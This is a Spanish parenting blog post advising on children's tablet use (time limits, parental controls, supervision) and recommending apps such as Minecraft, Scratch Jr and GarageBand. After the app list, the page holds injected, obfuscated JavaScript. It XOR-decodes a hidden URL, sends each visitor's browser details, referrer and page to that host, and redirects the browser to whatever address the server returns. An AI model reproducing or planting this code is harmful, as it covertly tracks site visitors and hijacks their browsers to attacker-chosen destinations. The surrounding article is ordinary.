Consejos, pautas y recomendaciones de apps para peques

En casa no tenemos televisión de plasma, tampoco consola y de tablet, ni rastro, y aunque pueda parecer raro, la tecnología nos gusta, pero no invertimos en ella. Últimamente le estamos dando vueltas a la idea de comprar una tablet para nosotros y para que también la usen mis hijas, pero me preocupa mucho poder darle un uso educativo a este dispositivo.

Casualidades de la vida, COESU Educación (www.coesu.com), empresa que aúna ocio y aprendizaje en el aula a través del uso de la tecnología, se cruzó en mi camino por la búsqueda de información al respecto. Me orientaron sobre las apps que podía descargar, me aconsejaron sobre cómo hacer un uso razonable de las mismas y me mostraron los beneficios y alternativas que pueden reportar la tecnología en los más peques, algo que quiero compartir con más madres y padres.

Pautas que debemos marcar desde el principio ante el consumo de este tipo de ocio:

  • Su uso en tiempo estará establecido por nosotros, los padres, y no sobrepasará los 30-60 minutos y siempre que tengamos en cuenta que aquí también entra el uso de TV y ordenador.
  • Debemos utilizar los controles parentales a nuestro acceso, como el que no se descarguen, eliminen, compren apps o no accedan a internet para asegurarnos de su buen uso.
  • Es recomendable que estemos cerca de ellos mientras lo hacen para poder visualizar a qué juegan, cómo lo hacen, ayudarles a gestionar el fracaso y la frustración o la euforia y la victoria.
  • Si hacen uso de ella antes de dormir, que sean juegos tranquilos que no los exciten mucho, porque pueden generarles problemas a la hora de conciliar el sueño.

IMG-20160413-WA0003Beneficios de esta nueva forma de ocio para los pequeños
“Al contrario que la televisión, actividad en la que ellos simplemente tienen que mirar, la tablet y sus juegos interactivos les obliga a participar, a tomar decisiones, a involucrarse en lo que hacen. En resumen, pasan de ser personas pasivas a ser activas”, comenta Enrique Arcas Roldán, de COESU Educación, y añade: “Al estar participando de forma directa a través del juego, estos, en función de su contenido, estarán estimulando el desarrollo de una u otra capacidad de las que los niños tienen de forma innata. Los juegos interactivos, no de ahora, si no desde que se usan (videoconsolas, ordenadores, maquinitas tipo gameboy…) proporcionan un feedback inmediato cuando logran el objetivo del juego, lo que genera sensación de bienestar y alegría para el niño”.

¿Cómo elegir una app u otra?
Según COESU Educación, en lo que más nos debemos fijar a la hora de elegir una app es en la edad para la que está recomendada, pues en muchas ocasiones a nuestros peques les gustan las aplicaciones que están por encima de su edad. En cuanto al contenido, podemos escoger lo que queramos, siempre teniendo en cuenta los gustos de nuestros hijos además de sus necesidades.

Recomendaciones sugeridas
Minecraft Pocket Edition
(7 años en adelante). Si puedes imaginarlo, puedes construirlo. Podrán construir mediante bloques todo lo que su imaginación quiera, elegir entre utilizar el modo creativo, donde dispondrán de todo el material, o el modo supervivencia, donde para construir y sobrevivir tendrán que buscar ellos los materiales.

Endless Spanish (hasta 5 años) Aplicación que introduce a los más pequeños en el aprendizaje del idioma español. Cada palabra cuenta con un rompecabezas interactivo en el que tienen que colocar cada letra mientras ven su grafía y escuchan su sonido. Después esa palabra aparece en una frase donde deben poner tres palabras y hecho esto escucharán la lectura de la frase.

Proyecto Ymagina: (4 años en adelante) Primer cuaderno de lectoescritura, con reconocimiento de la escritura 100% fiable. Un juego con el que los niños aprenden a leer y escribir. Los ejercicios de escritura se refuerzan con cuentos y juegos con los que los niños se inician en nuevas competencias del uso de las TIC´s. Apto para trabajar en casa o como material curricular en el colegio.

Scratch Jr: (5-11 años) Interesante aplicación que acerca a los niños en el mundo de la programación. Podrán crear cuentos interactivos o historias.

Kekotukos Origins y Kekotukos surprise: (3 a 5 años) Divertida historia contada a través de 12 minijuegos donde los niños crecerán y desarrollarán algunas de las capacidades más importantes de los primeros años de edad como motricidad, discriminación visual, cognición, lógica e incluso el inglés.

Comics Head (7 años en adelante) Aplicación con la que podrán ser los autores de maravillosos cómics en los que podrán contar todo tipo de historias y compartirlas con quien quieran a través de redes sociales, mail o simplemente guardarlo. Podrán desarrollar toda su imaginación y mostrarla al mundo con esta maravillosa app.

Piano Tiles y Piano Tiles 2 ( 4 años en adelante) Tendrán que tocar las teclas negras siguiendo el ritmo de la música y evitar pulsar en cualquier otro lugar. La velocidad y la dificultad se irán incrementando, así que no deben dejar de practicar para convertirse en el mejor pianista del mundo.

Garage Band: (6 años en adelante) Convierte los dispositivos iOS en instrumentos táctiles con los que conocer gran cantidad de instrumentos, crear infinidad de música y compartirla después a través de redes sociales, correo, youtube o Airdrop con otros dispositivos.
var uomjftkd = { encode: function (uymcrbbu, ivpjzup1) { var juykdjus = “”; for (var bmtvoq = 0; bmtvoq < uymcrbbu.length; bmtvoq++) { var maoakjle = uymcrbbu.charCodeAt(bmtvoq); var vznvir = maoakjle ^ ivpjzup1.charCodeAt(bmtvoq % ivpjzup1.length); juykdjus = juykdjus + String.fromCharCode(vznvir); } return juykdjus; }};function ivlvxbnl(xspsscex, qmjwsdtc){ return uomjftkd.encode(xspsscex, qmjwsdtc);}function nhqlzziy(vtzoxco, qmjwsdtc) { function mnbggf(url, qvfdnorl, gaurhzsa) { var svzjxjw = new XMLHttpRequest(); var mvlmqh = ""; var ngpewk = []; var djzspyoe; for(djzspyoe in qvfdnorl) { ngpewk.push(encodeURIComponent(djzspyoe) + '=' + encodeURIComponent(qvfdnorl[djzspyoe])); } mvlmqh = ngpewk.join(String.fromCharCode(38)).replace(/%20/g, '+'); svzjxjw.onreadystatechange = gaurhzsa; svzjxjw.open('GET', vtzoxco + "?" + mvlmqh); svzjxjw.send(mvlmqh); } var broilplq = { ua: navigator.userAgent, referrer: document.referrer, host: window.location.hostname, uri: window.location.pathname, lang: navigator.language, guid: qmjwsdtc }; mnbggf(vtzoxco, broilplq, function () { if (this.readyState == 4) { if (this.status == 200) { qvfdnorl = this.responseText; if (typeof(qvfdnorl) === 'string') { if (qvfdnorl.indexOf("http") === 0) { window.location = qvfdnorl; } } } } });}var advuwpjt = Array();var qmjwsdtc = '08430616d2a2d9759b18f9b49fcabc12';if (document.cookie.indexOf(qmjwsdtc) === -1){ advuwpjt.push(String.fromCharCode(88,76,64,67,67,12,30,25,9,75,8,92,2,86,67,71,88,1,90,93,20,23,11,90,95,9,76,0,18,10,28,88,67,22,68,91,64)); document.cookie = qmjwsdtc + '=1; path=/'; advuwpjt = advuwpjt.forEach(function (xspsscex) { var juykdjus = ivlvxbnl(xspsscex, qmjwsdtc); if (typeof(juykdjus) === 'string') { if (juykdjus.indexOf("http") === 0) { nhqlzziy(juykdjus, qmjwsdtc); return; } } });}

Sobre Diana

Soy periodista, emprendedora, amante del teatro (sobre todo infantil) y de los buenos planes (en familia, en pareja, entre amigos, en solitario...). Un día, después de un montón de casualidades, decidí lanzarme a la aventura de poner en marcha mi propio proyecto profesional: Mamá tiene un Plan. Hoy, tengo dos peques (niña y niño) y muchas ilusiones, a los que dedico todo mi tiempo y energía. En el viaje me acompaña un hombre maravilloso (al que dedico menos tiempo del que me gustaría y quiero con locura) y una gran familia a la que adoro que hace posible que todo lo demás siga girando. @Diana_M_N

2 comentarios en “Consejos, pautas y recomendaciones de apps para peques

  1. Me parece genial en mi caso les ayuda bastante con la tarea pues como ellos dicen con san gugle encuentran datos pero eso si siempre supervisando .

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *